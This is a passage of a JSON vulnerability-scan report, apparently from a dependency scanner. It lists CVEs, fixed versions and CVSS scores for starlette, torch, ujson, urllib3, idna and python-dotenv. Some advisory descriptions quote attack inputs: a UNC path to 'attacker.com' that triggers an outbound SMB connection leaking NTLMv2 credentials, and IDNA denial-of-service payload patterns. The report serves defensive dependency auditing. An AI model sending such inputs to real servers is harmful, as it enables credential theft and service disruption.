"PkgName": "starlette",
"PkgIdentifier": {
"PURL": "pkg:pypi/starlette@0.50.0"
},
"InstalledVersion": "0.50.0",
"FixedVersion": "1.1.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-48818",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "starlette: Starlette: SSRF and NTLM credential theft via UNC paths in StaticFiles on Windows",
"Description": "Starlette is a lightweight ASGI framework/toolkit. In versions 1.0.1 and earlier, StaticFiles on Windows is vulnerable to SSRF. An UNC path such as \\\\attacker.com\\share can cause os.path.realpath to initiate an outbound SMB connection before the path is rejected, exposing the service account\u2019s NTLMv2 credentials for offline cracking or relay even though the HTTP response is only a 404. The issue affects default follow_symlink=False deployments, including frameworks built on Starlette such as FastAPI; POSIX systems and follow_symlink=True are unaffected. The issue is fixed in 1.1.0.",
"Severity": "HIGH",
"CweIDs": [
"CWE-918"
],
"VendorSeverity": {
"ghsa": 3,
"redhat": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-48818",
"https://github.com/Kludex/starlette",
"https://github.com/Kludex/starlette/commit/fd53168a7767b6b55ba5af787fd88f49e33cabc5",
"https://github.com/Kludex/starlette/pull/3287",
"https://github.com/Kludex/starlette/releases/tag/1.1.0",
"https://github.com/Kludex/starlette/security/advisories/GHSA-wqp7-x3pw-xc5r",
"https://nvd.nist.gov/vuln/detail/CVE-2026-48818",
"https://www.cve.org/CVERecord?id=CVE-2026-48818"
],
"PublishedDate": "2026-06-17T19:18:09.807Z",
"LastModifiedDate": "2026-06-22T18:28:19.33Z"
},
{
"VulnerabilityID": "CVE-2026-54283",
"PkgName": "starlette",
"PkgIdentifier": {
"PURL": "pkg:pypi/starlette@0.50.0"
},
"InstalledVersion": "0.50.0",
"FixedVersion": "1.3.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-54283",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "Starlette is a lightweight ASGI framework/toolkit. From 0.4.1 until 1. ...",
"Description": "Starlette is a lightweight ASGI framework/toolkit. From 0.4.1 until 1.3.1, request.form() accepts max_fields and max_part_size to bound resource consumption while parsing form data. These limits are enforced for multipart/form-data, but silently ignored for application/x-www-form-urlencoded. An unauthenticated attacker can therefore send a urlencoded body with an arbitrarily large number of fields or an arbitrarily large field, even when the application configured limits it believed would apply. This vulnerability is fixed in 1.3.1.",
"Severity": "HIGH",
"CweIDs": [
"CWE-770"
],
"VendorSeverity": {
"ghsa": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://github.com/Kludex/starlette",
"https://github.com/Kludex/starlette/security/advisories/GHSA-82w8-qh3p-5jfq"
],
"PublishedDate": "2026-06-22T18:16:46.943Z",
"LastModifiedDate": "2026-06-22T18:28:19.33Z"
},
{
"VulnerabilityID": "CVE-2026-48710",
"PkgName": "starlette",
"PkgIdentifier": {
"PURL": "pkg:pypi/starlette@0.50.0"
},
"InstalledVersion": "0.50.0",
"FixedVersion": "1.0.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-48710",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "starlette: Starlette: Security restriction bypass via malformed HTTP Host header",
"Description": "Starlette is a lightweight ASGI framework/toolkit. Prior to version 1.0.1, the HTTP `Host` request header was not validated before being used to reconstruct `request.url`. Because the routing algorithm relies on the raw HTTP path while `request.url` is rebuilt from the `Host` header, a malformed header could make `request.url.path` differ from the path that was actually requested. Middleware and endpoints that apply security restrictions based on `request.url` (rather than the raw `scope` path) could therefore be bypassed. Users should upgrade to a version greater than or equal to version 1.0.1, which validates the `Host` header against the grammar of RFC 9112 \u00a73.2 / RFC 3986 \u00a73.2.2 when constructing `request.url` and falls back to `scope[\"server\"]` for malformed values.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-444",
"CWE-1289"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2,
"redhat": 4
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"V3Score": 6.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"V3Score": 6.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"V3Score": 6.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-48710",
"https://badhost.org",
"https://github.com/Kludex/starlette",
"https://github.com/Kludex/starlette/commit/764dab0dcfb9033d75442d7a359645c9f94648c6",
"https://github.com/Kludex/starlette/security/advisories/GHSA-86qp-5c8j-p5mr",
"https://github.com/pypa/advisory-database/tree/main/vulns/starlette/PYSEC-2026-161.yaml",
"https://nvd.nist.gov/vuln/detail/CVE-2026-48710",
"https://ostif.org/disclosing-the-badhost-vulnerability-in-starlette",
"https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-48710.json",
"https://www.cve.org/CVERecord?id=CVE-2026-48710",
"https://www.secwest.net/starlette",
"https://www.x41-dsec.de/lab/advisories/x41-2026-002-starlette"
],
"PublishedDate": "2026-05-26T22:16:44.02Z",
"LastModifiedDate": "2026-06-17T10:55:13.44Z"
},
{
"VulnerabilityID": "CVE-2026-48817",
"PkgName": "starlette",
"PkgIdentifier": {
"PURL": "pkg:pypi/starlette@0.50.0"
},
"InstalledVersion": "0.50.0",
"FixedVersion": "1.1.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-48817",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "starlette: Starlette: Information disclosure and unintended method execution via non-standard HTTP methods",
"Description": "Starlette is a lightweight ASGI framework/toolkit. In versions 1.0.1 and below, when dispatching a request, HTTPEndpoint selects the handler by lowercasing the HTTP method and looking it up as an attribute with getattr, without restricting the lookup to a known set of HTTP verbs. When an HTTPEndpoint subclass is registered through Route(...) without an explicit methods= argument, the route does not constrain the method and every method reaches the endpoint. If a non-standard HTTP method whose lowercased name matches an attribute on the endpoint subclass reaches the endpoint, that attribute is invoked as if it were a request handler. An attacker can use this to reach methods that were never meant to be HTTP handlers, such as internal helpers, without the authorization checks applied by the intended public handler. An application (including Starlette-based frameworks like FastAPI) is affected if it registers an HTTPEndpoint subclass via Route(...) without explicitly setting methods=, and that subclass includes extra methods named like non-standard HTTP verbs that take one request argument and return a response. This issue has been fixed in version 1.1.0.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-470"
],
"VendorSeverity": {
"ghsa": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"V3Score": 5.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-48817",
"https://github.com/Kludex/starlette",
"https://github.com/Kludex/starlette/releases/tag/1.1.0",
"https://github.com/Kludex/starlette/security/advisories/GHSA-x746-7m8f-x49c",
"https://nvd.nist.gov/vuln/detail/CVE-2026-48817",
"https://www.cve.org/CVERecord?id=CVE-2026-48817"
],
"PublishedDate": "2026-06-17T20:17:22.427Z",
"LastModifiedDate": "2026-06-22T18:28:19.33Z"
},
{
"VulnerabilityID": "CVE-2025-2999",
"PkgName": "torch",
"PkgIdentifier": {
"PURL": "pkg:pypi/torch@2.8.0"
},
"InstalledVersion": "2.8.0",
"FixedVersion": "2.9.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-2999",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "A vulnerability was found in PyTorch 2.6.0. It has been rated as criti ...",
"Description": "A vulnerability was found in PyTorch 2.6.0. It has been rated as critical. Affected by this issue is the function torch.nn.utils.rnn.unpack_sequence. The manipulation leads to memory corruption. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-119"
],
"VendorSeverity": {
"bitnami": 2,
"ghsa": 2
},
"CVSS": {
"bitnami": {},
"ghsa": {
"V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"V3Score": 5.3
}
},
"References": [
"https://github.com/pypa/advisory-database/tree/main/vulns/torch/PYSEC-2025-193.yaml",
"https://github.com/pytorch/pytorch",
"https://github.com/pytorch/pytorch/commit/494518046816d29099b7d056a74ffa5c244fdcdd",
"https://github.com/pytorch/pytorch/issues/149622",
"https://github.com/pytorch/pytorch/issues/149622#issue-2935495265",
"https://nvd.nist.gov/vuln/detail/CVE-2025-2999",
"https://vuldb.com/?ctiid.302048",
"https://vuldb.com/?id.302048",
"https://vuldb.com/?submit.524198"
],
"PublishedDate": "2025-03-31T15:15:44.657Z",
"LastModifiedDate": "2026-06-17T09:08:00.86Z"
},
{
"VulnerabilityID": "CVE-2026-32874",
"PkgName": "ujson",
"PkgIdentifier": {
"PURL": "pkg:pypi/ujson@5.10.0"
},
"InstalledVersion": "5.10.0",
"FixedVersion": "5.12.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-32874",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "UltraJSON: UltraJSON: Denial of Service due to memory leak when parsing large integers",
"Description": "UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. Versions 5.4.0 through 5.11.0 contain an accumulating memory leak in JSON parsing large (outside of the range [-2^63, 2^64 - 1]) integers. The leaked memory is a copy of the string form of the integer plus an additional NULL byte. The leak occurs irrespective of whether the integer parses successfully or is rejected due to having more than sys.get_int_max_str_digits() digits, meaning that any sized leak per malicious JSON can be achieved provided that there is no limit on the overall size of the payload. Any service that calls ujson.load()/ujson.loads()/ujson.decode() on untrusted inputs is affected and vulnerable to denial of service attacks. This issue has been fixed in version 5.12.0.",
"Severity": "HIGH",
"CweIDs": [
"CWE-401"
],
"VendorSeverity": {
"ghsa": 3,
"photon": 3,
"redhat": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-32874",
"https://github.com/ultrajson/ultrajson",
"https://github.com/ultrajson/ultrajson/commit/4baeb950df780092bd3c89fc702a868e99a3a1d2",
"https://github.com/ultrajson/ultrajson/releases/tag/5.12.0",
"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-wgvc-ghv9-3pmm",
"https://nvd.nist.gov/vuln/detail/CVE-2026-32874",
"https://ubuntu.com/security/notices/USN-8219-1",
"https://www.cve.org/CVERecord?id=CVE-2026-32874"
],
"PublishedDate": "2026-03-20T02:16:35.703Z",
"LastModifiedDate": "2026-06-17T10:36:29.403Z"
},
{
"VulnerabilityID": "CVE-2026-32875",
"PkgName": "ujson",
"PkgIdentifier": {
"PURL": "pkg:pypi/ujson@5.10.0"
},
"InstalledVersion": "5.10.0",
"FixedVersion": "5.12.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-32875",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "ultrajson: UltraJSON: Denial of Service via large indent parameter in JSON serialization",
"Description": "UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. Versions 5.10 through 5.11.0 are vulnerable to buffer overflow or infinite loop through large indent handling. ujson.dumps() crashes the Python interpreter (segmentation fault) when the product of the indent parameter and the nested depth of the input exceeds INT32_MAX. It can also get stuck in an infinite loop if the indent is a large negative number. Both are caused by an integer overflow/underflow whilst calculating how much memory to reserve for indentation. And both can be used to achieve denial of service. To be vulnerable, a service must call ujson.dump()/ujson.dumps()/ujson.encode() whilst giving untrusted users control over the indent parameter and not restrict that indentation to reasonably small non-negative values. A service may also be vulnerable to the infinite loop if it uses a fixed negative indent. An underflow always occurs for any negative indent when the input data is at least one level nested but, for small negative indents, the underflow is usually accidentally rectified by another overflow. This issue has been fixed in version 5.12.0.",
"Severity": "HIGH",
"CweIDs": [
"CWE-190",
"CWE-787",
"CWE-835"
],
"VendorSeverity": {
"ghsa": 3,
"photon": 3,
"redhat": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-32875",
"https://github.com/ultrajson/ultrajson",
"https://github.com/ultrajson/ultrajson/commit/486bd4553dc471a1de11613bc7347a6b318e37ea",
"https://github.com/ultrajson/ultrajson/issues/700",
"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-c8rr-9gxc-jprv",
"https://nvd.nist.gov/vuln/detail/CVE-2026-32875",
"https://ubuntu.com/security/notices/USN-8219-1",
"https://www.cve.org/CVERecord?id=CVE-2026-32875"
],
"PublishedDate": "2026-03-20T02:16:35.887Z",
"LastModifiedDate": "2026-06-17T10:36:29.517Z"
},
{
"VulnerabilityID": "CVE-2026-44660",
"PkgName": "ujson",
"PkgIdentifier": {
"PURL": "pkg:pypi/ujson@5.10.0"
},
"InstalledVersion": "5.10.0",
"FixedVersion": "5.12.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44660",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "python-ujson: UltraJSON: Memory leak leading to Denial of Service",
"Description": "UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. Prior to 5.12.1, when ujson.dump() writes to a file-like object and the write operation raises an exception, the serialized JSON string object is not decremented, leaking memory. Each failed write operation leaks the full size of the serialized payload. This vulnerability is fixed in 5.12.1.",
"Severity": "HIGH",
"CweIDs": [
"CWE-401"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 3,
"photon": 3,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-44660",
"https://github.com/ultrajson/ultrajson",
"https://github.com/ultrajson/ultrajson/commit/82af1d0ac01d09aa40c887b460d44b9d9f4bccd9",
"https://github.com/ultrajson/ultrajson/releases/tag/5.12.1",
"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-c38f-wx89-p2xg",
"https://nvd.nist.gov/vuln/detail/CVE-2026-44660",
"https://www.cve.org/CVERecord?id=CVE-2026-44660"
],
"PublishedDate": "2026-05-27T21:16:17.65Z",
"LastModifiedDate": "2026-06-17T10:51:12.35Z"
},
{
"VulnerabilityID": "CVE-2026-54911",
"PkgName": "ujson",
"PkgIdentifier": {
"PURL": "pkg:pypi/ujson@5.10.0"
},
"InstalledVersion": "5.10.0",
"FixedVersion": "5.13.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-54911",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "UltraJSON is a fast JSON encoder and decoder written in pure C with bi ...",
"Description": "UltraJSON is a fast JSON encoder and decoder written in pure C with bindings for Python 3.7+. Prior to 5.13.0, ujson.dumps() (or ujson.dump() or ujson.encode()) have a reject_bytes=False option. When set, they may accept malformed or truncated UTF-8 byte sequences, silently rewriting them into different Unicode characters instead of rejecting them. This leads to input validation bypass and data integrity issues. This vulnerability is fixed in 5.13.0.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-20"
],
"VendorSeverity": {
"ghsa": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"V3Score": 6.5
}
},
"References": [
"https://github.com/ultrajson/ultrajson",
"https://github.com/ultrajson/ultrajson/commit/169eaf36b1116fece5034ee79a7a0ef3f6deedcf",
"https://github.com/ultrajson/ultrajson/releases/tag/5.13.0",
"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-3j69-69wj-xqx2"
],
"PublishedDate": "2026-06-22T22:16:50.397Z",
"LastModifiedDate": "2026-06-22T22:16:50.397Z"
},
{
"VulnerabilityID": "CVE-2026-21441",
"PkgName": "urllib3",
"PkgIdentifier": {
"PURL": "pkg:pypi/urllib3@2.6.2"
},
"InstalledVersion": "2.6.2",
"FixedVersion": "2.6.3",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-21441",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "urllib3: urllib3 vulnerable to decompression-bomb safeguard bypass when following HTTP redirects (streaming API)",
"Description": "urllib3 is an HTTP client library for Python. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. Starting in version 1.22 and prior to version 2.6.3, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client. Applications and libraries are affected when they stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. Users should upgrade to at least urllib3 v2.6.3, in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable redirects by setting `redirect=False` for requests to untrusted source.",
"Severity": "HIGH",
"CweIDs": [
"CWE-409"
],
"VendorSeverity": {
"alma": 3,
"amazon": 3,
"azure": 3,
"cbl-mariner": 3,
"ghsa": 3,
"nvd": 3,
"oracle-oval": 3,
"photon": 3,
"redhat": 3,
"rocky": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/errata/RHSA-2026:1239",
"https://access.redhat.com/security/cve/CVE-2026-21441",
"https://bugzilla.redhat.com/2419455",
"https://bugzilla.redhat.com/2419467",
"https://bugzilla.redhat.com/2427726",
"https://bugzilla.redhat.com/show_bug.cgi?id=2419455",
"https://bugzilla.redhat.com/show_bug.cgi?id=2419467",
"https://bugzilla.redhat.com/show_bug.cgi?id=2427726",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66418",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66471",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21441",
"https://errata.almalinux.org/9/ALSA-2026-1239.html",
"https://errata.rockylinux.org/RLSA-2026:1254",
"https://github.com/urllib3/urllib3",
"https://github.com/urllib3/urllib3/commit/8864ac407bba8607950025e0979c4c69bc7abc7b",
"https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99",
"https://linux.oracle.com/cve/CVE-2026-21441.html",
"https://linux.oracle.com/errata/ELSA-2026-1254.html",
"https://lists.debian.org/debian-lts-announce/2026/01/msg00017.html",
"https://nvd.nist.gov/vuln/detail/CVE-2026-21441",
"https://ubuntu.com/security/notices/USN-7955-1",
"https://ubuntu.com/security/notices/USN-7955-2",
"https://ubuntu.com/security/notices/USN-8010-1",
"https://www.cve.org/CVERecord?id=CVE-2026-21441"
],
"PublishedDate": "2026-01-07T22:15:44.04Z",
"LastModifiedDate": "2026-06-17T10:18:40.75Z"
},
{
"VulnerabilityID": "CVE-2026-44431",
"PkgName": "urllib3",
"PkgIdentifier": {
"PURL": "pkg:pypi/urllib3@2.6.2"
},
"InstalledVersion": "2.6.2",
"FixedVersion": "2.7.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44431",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "urllib3: urllib3: Information disclosure via cross-origin redirects forwarding sensitive headers",
"Description": "urllib3 is an HTTP client library for Python. From 1.23 to before 2.7.0, cross-origin redirects followed from the low-level API via ProxyManager.connection_from_url().urlopen(..., assert_same_host=False) still forward these sensitive headers. This vulnerability is fixed in 2.7.0.",
"Severity": "HIGH",
"CweIDs": [
"CWE-200"
],
"VendorSeverity": {
"amazon": 2,
"azure": 3,
"ghsa": 3,
"nvd": 2,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"V3Score": 5.3
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"V3Score": 5.9
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-44431",
"https://github.com/urllib3/urllib3",
"https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc",
"https://nvd.nist.gov/vuln/detail/CVE-2026-44431",
"https://ubuntu.com/security/notices/USN-8379-1",
"https://www.cve.org/CVERecord?id=CVE-2026-44431"
],
"PublishedDate": "2026-05-13T16:16:57.15Z",
"LastModifiedDate": "2026-06-17T10:50:38.253Z"
},
{
"VulnerabilityID": "CVE-2026-44432",
"PkgName": "urllib3",
"PkgIdentifier": {
"PURL": "pkg:pypi/urllib3@2.6.2"
},
"InstalledVersion": "2.6.2",
"FixedVersion": "2.7.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44432",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "urllib3: urllib3: Denial of Service due to excessive HTTP response decompression",
"Description": "urllib3 is an HTTP client library for Python. From 2.6.0 to before 2.7.0, urllib3 could decompress the whole response instead of the requested portion (1) during the second HTTPResponse.read(amt=N) call when the response was decompressed using the official Brotli library or (2) when HTTPResponse.drain_conn() was called after the response had been read and decompressed partially (compression algorithm did not matter here). These issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data) on the client side. This vulnerability is fixed in 2.7.0.",
"Severity": "HIGH",
"CweIDs": [
"CWE-409"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 3,
"redhat": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-44432",
"https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2026-142.yaml",
"https://github.com/urllib3/urllib3",
"https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j",
"https://nvd.nist.gov/vuln/detail/CVE-2026-44432",
"https://ubuntu.com/security/notices/USN-8379-1",
"https://www.cve.org/CVERecord?id=CVE-2026-44432"
],
"PublishedDate": "2026-05-13T16:16:57.303Z",
"LastModifiedDate": "2026-06-17T10:50:38.37Z"
}
]
},
{
"Target": "utils/eizen_utils/requirements.txt",
"Class": "lang-pkgs",
"Type": "pip",
"Vulnerabilities": [
{
"VulnerabilityID": "CVE-2026-45409",
"PkgName": "idna",
"PkgIdentifier": {
"PURL": "pkg:pypi/idna@3.10"
},
"InstalledVersion": "3.10",
"FixedVersion": "3.15",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45409",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "Internationalized Domain Names in Applications (IDNA) for Python provi ...",
"Description": "Internationalized Domain Names in Applications (IDNA) for Python provides support for Internationalized Domain Names in Applications (IDNA) and Unicode IDNA Compatibility Processing. In versions prior to 3.15, payloads such as `\"\\u0660\" * N` or `\"\\u30fb\" * N + \"\\u6f22\"` utilize the `valid_contexto` function prior to length rejection, and for high values of `N` will take a long time to process. This is the same issue as CVE-2024-3651, however the original remediation in 2024 was not a complete fix. A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service. Starting in version 3.14, the function rejects long inputs as soon as practicable prior to any further processing to minimize resource consumption. In version 3.15, this approach was extended to lesser used alternate functions (i.e. per-label conversions and codec support). A workaround is available. Domain names cannot exceed 253 characters in length. If this length limit is enforced prior to passing the domain to the `idna.encode()` function, it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-1333"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2
},
"CVSS": {
"ghsa": {},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"V3Score": 5.3
}
},
"References": [
"https://github.com/kjd/idna",
"https://github.com/kjd/idna/security/advisories/GHSA-65pc-fj4g-8rjx",
"https://nvd.nist.gov/vuln/detail/CVE-2026-45409"
],
"PublishedDate": "2026-06-05T23:16:43.343Z",
"LastModifiedDate": "2026-06-17T10:52:01.58Z"
},
{
"VulnerabilityID": "CVE-2026-28684",
"PkgName": "python-dotenv",
"PkgIdentifier": {
"PURL": "pkg:pypi/python-dotenv@1.1.0"
},
"InstalledVersion": "1.1.0",
"FixedVersion": "1.2.2",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-28684",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory pip",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
},
"Title": "python-dotenv: python-dotenv: Arbitrary file overwrite via symbolic link following",
